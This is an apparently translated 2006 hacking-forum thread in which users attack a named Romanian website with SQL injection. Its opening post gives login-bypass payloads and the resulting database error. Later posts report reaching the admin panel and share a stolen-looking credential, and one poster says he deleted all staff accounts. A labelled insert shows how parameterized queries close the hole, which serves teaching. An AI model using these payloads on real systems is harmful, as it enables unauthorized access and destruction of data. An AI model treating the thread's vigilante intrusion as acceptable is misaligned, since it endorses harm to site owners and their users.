escalation666 Posted December 10, 2006
http://www.fotoshop.ro that's the target
Why? Because it sends spam
Vulnerability: SQL injection
PoC: user:admin'--
Database error: Invalid SQL: SELECT u.id_user, u.id_user_group, u.status, u.email, ug.level, u.user_name FROM site_user u, site_user_group ug WHERE u.password='' AND u.user_name='admin'--' AND ug.id_user_group = u.id_user_group
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND ug.id_user_group = u.id_user_group' at line 5)
I'm too lazy these days to try to find out the admin password.
Also, if you put 'or''=' as both the user and the password, you'll get a pleasant surprise.
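Added example, not part of the original thread and not the site's code: the login query from the error message above, built by string concatenation and then with bound parameters. It assumes SQLite in place of the site's MySQL; the table and column names come from the error message, while the rows and function names are constructed for illustration.

```python
import sqlite3

# Constructed schema and rows; names follow the query shown in the error message.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE site_user_group (id_user_group INTEGER PRIMARY KEY, level INTEGER);
        CREATE TABLE site_user (id_user INTEGER PRIMARY KEY, id_user_group INTEGER,
            status INTEGER, email TEXT, user_name TEXT, password TEXT);
        INSERT INTO site_user_group VALUES (1, 10), (2, 1);
        INSERT INTO site_user VALUES
            (1, 1, 1, 'admin@example.test', 'admin', 'constructed-admin-secret'),
            (2, 2, 1, 'user@example.test', 'alice', 'constructed-user-secret');
    """)
    return conn

COLUMNS = "u.id_user, u.id_user_group, u.status, u.email, ug.level, u.user_name"

def login_concatenated(conn, user_name, password):
    """'Before': input is pasted into the SQL text, so quotes in it become syntax."""
    sql = (f"SELECT {COLUMNS} FROM site_user u, site_user_group ug "
           f"WHERE u.password='{password}' AND u.user_name='{user_name}' "
           "AND ug.id_user_group = u.id_user_group")
    return conn.execute(sql).fetchone()

def login_parameterized(conn, user_name, password):
    """'After': placeholders keep input as data; the statement's structure is fixed."""
    sql = (f"SELECT {COLUMNS} FROM site_user u, site_user_group ug "
           "WHERE u.password = ? AND u.user_name = ? "
           "AND ug.id_user_group = u.id_user_group")
    return conn.execute(sql, (password, user_name)).fetchone()

if __name__ == "__main__":
    conn = make_db()
    probe = "'or''='"  # the string quoted in the post above
    print("concatenated :", login_concatenated(conn, probe, probe))
    print("parameterized:", login_parameterized(conn, probe, probe))
    print("valid login  :", login_parameterized(conn, "admin", "constructed-admin-secret"))
```

Binding parameters fixes the injection only; the query in the error message also compares the password column directly, which this sketch leaves as it is.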
lordping Posted December 10, 2006
http://www.fotoshop.ro/admin + the data above ... => access to the admin's password and more
J0K3R Posted December 10, 2006
escalation666 wrote: Also, if you put 'or''=' as both the user and the password, you'll get a pleasant surprise.
Is this an SQL injection? :?
Guest flama Posted December 10, 2006
user: kadaj
pass: sugipula
Excuse this password; it's in case the SQL injection stops working for you.
Crhistmas Posted December 10, 2006
What I knew is that you take the page's source code, strip the Java out of it so that you can see what you type in the pass field, and put something like " * or 1+1 -- " there and whatever you want as the user... I don't know if that's correct... if not, please correct me. Thanks anyway.
escalation666 Posted December 10, 2006 Author
gg flama!
christmas... it can be done that way too... you probably saw this in a video tutorial. It's useful to do this when you have to put an email address as the username... and the JavaScript doesn't let you put something like [mail]dfdf@fdwfdw.com[/mail]
Crhistmas Posted December 10, 2006
Uh-huh, thanks, but is there any program that makes the work easier?
Ras Posted December 10, 2006
You want there to be a button you press and that's it, the site is yours?? :@ :@
devianc3 Posted December 10, 2006
It says the member doesn't exist.. did somebody play around with this guy's user? like.. change username?
greeny Posted December 10, 2006
devianc3 wrote: It says the member doesn't exist.. did somebody play around with this guy's user? like.. change username?
I deleted everything that was in the "staff" group from the memberlist. I don't think it's a problem for us, more for the site's owner :@
impure Posted December 10, 2006
Let me see too what's on that site, to see what's going on.
Guest flama Posted December 11, 2006
greeny wrote: devianc3 wrote: It says the member doesn't exist.. did somebody play around with this guy's user? like.. change username? I deleted everything that was in the "staff" group from the memberlist. I don't think it's a problem for us, more for the site's owner :@
Ugh, all you're set on is destruction, kids.
Sad_Dreamer Posted December 11, 2006
How lame... after being spoon-fed the password they go and delete everything too.. pff.. fking kids. If I were in spiry's place I'd ban that guy... those people are partners with share.urbanfriends.us
thelegend Posted December 11, 2006
Nice work. How are you doing, comrade sad dreamer? Do you still remember me? Good luck.
4n4rchyl04d3r Posted December 17, 2006
...winners don't use copies....